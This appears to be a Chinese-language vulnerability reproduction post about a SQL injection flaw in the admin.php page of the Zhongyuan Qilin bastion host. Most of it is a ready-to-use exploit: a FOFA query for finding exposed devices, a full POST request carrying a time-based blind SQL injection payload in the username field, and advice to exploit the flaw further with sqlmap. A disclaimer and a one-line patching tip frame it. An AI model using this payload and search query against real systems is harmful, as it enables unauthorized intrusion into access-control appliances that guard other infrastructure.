漏洞复现--中远麒麟堡垒机SQL注入

免责声明：

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行承担！

一：漏洞描述

麒麟堡垒机用于运维管理的认证、授权、审计等监控管理，在该产品admin.php处存在SQL 注入漏洞

二:漏洞影响版本

–中远麒麟堡垒机

三：网络空间测绘查询

fofa语句：
cert.subject=“Baolei”

需要下载的可后台私我我发你

四：漏洞复现

POC：

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

盲注5s

漏洞存在，sqlmap直接利用

五：修复方案

自行寻找厂家发布的安全补丁，若暂无补丁，尽快将系统放入内网。